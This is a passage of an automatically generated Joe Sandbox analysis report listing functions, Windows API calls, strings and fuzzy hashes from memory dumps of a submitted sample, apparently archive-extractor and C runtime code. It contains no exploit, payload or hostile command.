Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dab4f69829100315005ab188225a925b9265fe62f22017655c6bbcec8c35c480
Instruction ID: 54e2624de136a7382c13ffb908f918ecf7cc875a82b758b337662e4c1a19b595
Opcode Fuzzy Hash: dab4f69829100315005ab188225a925b9265fe62f22017655c6bbcec8c35c480
Instruction Fuzzy Hash: 96A001A62AD21BBC31187266ED16D3A036CE4C4BA53309B1BB51AD4289A98858495832

Function 008DDAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDAB2

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3de977fe9d44603d1624b6aa578d14c70ac97e94be2ff8d27c1808898cb4efd1
Instruction ID: 54e2624de136a7382c13ffb908f918ecf7cc875a82b758b337662e4c1a19b595
Opcode Fuzzy Hash: 3de977fe9d44603d1624b6aa578d14c70ac97e94be2ff8d27c1808898cb4efd1
Instruction Fuzzy Hash: 96A001A62AD21BBC31187266ED16D3A036CE4C4BA53309B1BB51AD4289A98858495832

Function 008DDBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDBD5

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 42db01501482fa5901968964caed9f355ee7a0a6e9957ddaee60c09dcdd8375a
Instruction ID: 3762aa4d97783bd8cbd4066ea3f9c1633e959ba0807dc7e80ebd147f6fbacbc3
Opcode Fuzzy Hash: 42db01501482fa5901968964caed9f355ee7a0a6e9957ddaee60c09dcdd8375a
Instruction Fuzzy Hash: 3CA0029926D20ABC31086265AD17D76032CF4C4B753314A1BB516D42455D545C595431

Function 008DDC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDBD5

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3dd10a9a4580340b229e4ad95ed135f9230d6df479b8889b39b63c2d9dabaea2
Instruction ID: 3762aa4d97783bd8cbd4066ea3f9c1633e959ba0807dc7e80ebd147f6fbacbc3
Opcode Fuzzy Hash: 3dd10a9a4580340b229e4ad95ed135f9230d6df479b8889b39b63c2d9dabaea2
Instruction Fuzzy Hash: 3CA0029926D20ABC31086265AD17D76032CF4C4B753314A1BB516D42455D545C595431

Function 008DDC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDBD5

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: beed7102fb9d58feff8981793f44bbbb0d623ccb760931d312b52d8605f9a2a7
Instruction ID: 3762aa4d97783bd8cbd4066ea3f9c1633e959ba0807dc7e80ebd147f6fbacbc3
Opcode Fuzzy Hash: beed7102fb9d58feff8981793f44bbbb0d623ccb760931d312b52d8605f9a2a7
Instruction Fuzzy Hash: 3CA0029926D20ABC31086265AD17D76032CF4C4B753314A1BB516D42455D545C595431

Function 008DDC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDBD5

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 10590bf670de89e1a390cc2c8979034c00d3ed4158c99abe314c079ef9afe1f8
Instruction ID: 3762aa4d97783bd8cbd4066ea3f9c1633e959ba0807dc7e80ebd147f6fbacbc3
Opcode Fuzzy Hash: 10590bf670de89e1a390cc2c8979034c00d3ed4158c99abe314c079ef9afe1f8
Instruction Fuzzy Hash: 3CA0029926D20ABC31086265AD17D76032CF4C4B753314A1BB516D42455D545C595431

Function 008DDC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDC36

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0bb6d926217e45d37e3ca72dbf5ee0b016f4c12c501b09af23fb0d8dc4bc7f79
Instruction ID: eacf85602799b8986ccc946fdad27853305b78f08c7d6d480d0359ff4e63c2a5
Opcode Fuzzy Hash: 0bb6d926217e45d37e3ca72dbf5ee0b016f4c12c501b09af23fb0d8dc4bc7f79
Instruction Fuzzy Hash: 7CA011AA2BC30ABC300C22A0AC02C3A032CE0C0B203308A0BB20AE0380AA802C088032

Function 008DDC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDC36

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cdfbda40027b8761b266590a4f07eae5ca60b12139989451196184bf88fb8770
Instruction ID: eacf85602799b8986ccc946fdad27853305b78f08c7d6d480d0359ff4e63c2a5
Opcode Fuzzy Hash: cdfbda40027b8761b266590a4f07eae5ca60b12139989451196184bf88fb8770
Instruction Fuzzy Hash: 7CA011AA2BC30ABC300C22A0AC02C3A032CE0C0B203308A0BB20AE0380AA802C088032

Function 008DA322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,008DA587,C:\Users\user\Desktop,00000000,0090946A,00000006), ref: 008DA326

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: df36868cf0286fef3fc1ee7aca2759bff5a71f0529f8d2b12ef3a2ab8421b6a2
Instruction ID: 3b13d796ad5210b23c73ef602876f97fb0c7695476c3340844853769d6593f12
Opcode Fuzzy Hash: df36868cf0286fef3fc1ee7aca2759bff5a71f0529f8d2b12ef3a2ab8421b6a2
Instruction Fuzzy Hash: 01A01230194006568A000B30CC09C2576506760702F0086207002C00A0CB31C854E500

Function 008C96D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,008C968F,?,?,?,?,008F1FA1,000000FF), ref: 008C96EB

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 3f2ae131c7b61bd56aa0e5f9fa4d4971dc8cff7a99652155f63b9ed984019c32
Instruction ID: 4c43a3263b775060d1c5b9c5ff809ed91dedcfce7008e056c9c52ce5922d4b2c
Opcode Fuzzy Hash: 3f2ae131c7b61bd56aa0e5f9fa4d4971dc8cff7a99652155f63b9ed984019c32
Instruction Fuzzy Hash: 28F05E30556B058FDB308A24D54CF92B7F4FB22725F048B6ED1EB834E0A771A84D9B00

Non-executed Functions

Function 008DB8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008C130B: GetDlgItem.USER32(00000000,00003021), ref: 008C134F
Part of subcall function 008C130B: SetWindowTextW.USER32(00000000,008F35B4), ref: 008C1365

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 008DB971
EndDialog.USER32(?,00000006), ref: 008DB984
GetDlgItem.USER32(?,0000006C), ref: 008DB9A0
SetFocus.USER32(00000000), ref: 008DB9A7
SetDlgItemTextW.USER32(?,00000065,?), ref: 008DB9E1
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 008DBA18
FindFirstFileW.KERNEL32(?,?), ref: 008DBA2E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008DBA4C
FileTimeToSystemTime.KERNEL32(?,?), ref: 008DBA5C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 008DBA78
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 008DBA94
_swprintf.LIBCMT ref: 008DBAC4

Part of subcall function 008C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008C401D

SetDlgItemTextW.USER32(?,0000006A,?), ref: 008DBAD7
FindClose.KERNEL32(00000000), ref: 008DBADE
_swprintf.LIBCMT ref: 008DBB37
SetDlgItemTextW.USER32(?,00000068,?), ref: 008DBB4A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 008DBB67
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 008DBB87
FileTimeToSystemTime.KERNEL32(?,?), ref: 008DBB97
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 008DBBB1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 008DBBC9
_swprintf.LIBCMT ref: 008DBBF5
SetDlgItemTextW.USER32(?,0000006B,?), ref: 008DBC08
_swprintf.LIBCMT ref: 008DBC5C
SetDlgItemTextW.USER32(?,00000069,?), ref: 008DBC6F

Part of subcall function 008DA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 008DA662
Part of subcall function 008DA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,008FE600,?,?), ref: 008DA6B1

Strings

REPLACEFILEDLG, xrefs: 008DB907
%s %s, xrefs: 008DBB29, 008DBC4E
%s %s %s, xrefs: 008DBAB2, 008DBBE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 4e99865bef7edb97bfe88ccd4c50f5b7411cf3037fb8559869c3a75f1da7d054
Instruction ID: 96a23aa2613f93205b2046c459d3f88e098645b441deb05ab4d17d0af427ad3a
Opcode Fuzzy Hash: 4e99865bef7edb97bfe88ccd4c50f5b7411cf3037fb8559869c3a75f1da7d054
Instruction Fuzzy Hash: DA91C2B2248348BBD6319BB4DC49FFB7BACFB49700F04091AB749D2191EB759605CB62

Function 008C718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008C7191
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 008C72F1
CloseHandle.KERNEL32(00000000), ref: 008C7301

Part of subcall function 008C7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 008C7C04
Part of subcall function 008C7BF5: GetLastError.KERNEL32 ref: 008C7C4A
Part of subcall function 008C7BF5: CloseHandle.KERNEL32(?), ref: 008C7C59

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 008C730C
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 008C741A
DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 008C7446
CloseHandle.KERNEL32(?), ref: 008C7457
GetLastError.KERNEL32 ref: 008C7467
RemoveDirectoryW.KERNEL32(?), ref: 008C74B3
DeleteFileW.KERNEL32(?), ref: 008C74DB

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 008C71BC
\??\, xrefs: 008C7217
UNC\, xrefs: 008C723C
SeRestorePrivilege, xrefs: 008C71B2

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: 256675149e3b8bfd2df292bda70259259428273b3ab1f6d9cf91606c9aa7b7f6
Instruction ID: c7033f3829e8738954be7f972ef363d86dac8e8896cb119e5026876c9a5d4030
Opcode Fuzzy Hash: 256675149e3b8bfd2df292bda70259259428273b3ab1f6d9cf91606c9aa7b7f6
Instruction Fuzzy Hash: D8B1CE71904619AADB25DB68CC45FEE7BB8FF04304F0041ADFA49E7242DB34EA48CB61

Function 008C3281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008C328A
_memcmp.LIBVCRUNTIME ref: 008C3377

Strings

h%u, xrefs: 008C362D
CMT, xrefs: 008C3990
hc%u, xrefs: 008C367B

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: 755e7a1f7a1aaf1edb44dafb7763571817f810831b39eef8e53bcf916f20af87
Instruction ID: be98f6c1db0ff61dbd701de984b1b940f589fea62f9ebeefec76fade8f79d887
Opcode Fuzzy Hash: 755e7a1f7a1aaf1edb44dafb7763571817f810831b39eef8e53bcf916f20af87
Instruction Fuzzy Hash: 57326C715106889BDF14DF68C885FEA37A5FF55300F04447EED8ACB282DA74EA4ACB61

Function 008ED00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 008ED154

Strings

1#INF, xrefs: 008EE361
1#QNAN, xrefs: 008EE35A
1#SNAN, xrefs: 008EE353
1#IND, xrefs: 008EE34C

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 34b628ac86c249ba416a80a89e5e6d3d947e74ce1944a518fe8aec914d068688
Instruction ID: 2b48f57d0d9d697a8410407bcc2dd07091000cb9f7a2c960b3f8573efc8f4b09
Opcode Fuzzy Hash: 34b628ac86c249ba416a80a89e5e6d3d947e74ce1944a518fe8aec914d068688
Instruction Fuzzy Hash: 32C24872E086688FDB25CE29DD407EAB7B5FB86314F1541EAD80DE7240E774AE858F40

Function 008C27E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008C27F1
_strlen.LIBCMT ref: 008C2D7F

Part of subcall function 008D137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,008CB652,00000000,?,?,?,00010466), ref: 008D1396

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008C2EE0

Strings

CMT, xrefs: 008C2F13

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1706572503-2756464174
Opcode ID: ec7616d83dcd9baeedc51056a63dbc466e28a16488d3c5e86134b03008c8cab6
Instruction ID: 199d0d3edf0e38d902954d6de966939a7bd81aae6fc1513ae51b7c0b40e8bfb4
Opcode Fuzzy Hash: ec7616d83dcd9baeedc51056a63dbc466e28a16488d3c5e86134b03008c8cab6
Instruction Fuzzy Hash: BA62AE719006488EDB29DF28C885BEA3BF1FF54304F09457EED9ACB282DA74E945CB51

Function 008E866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 008E8767
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 008E8771
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 008E877E

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
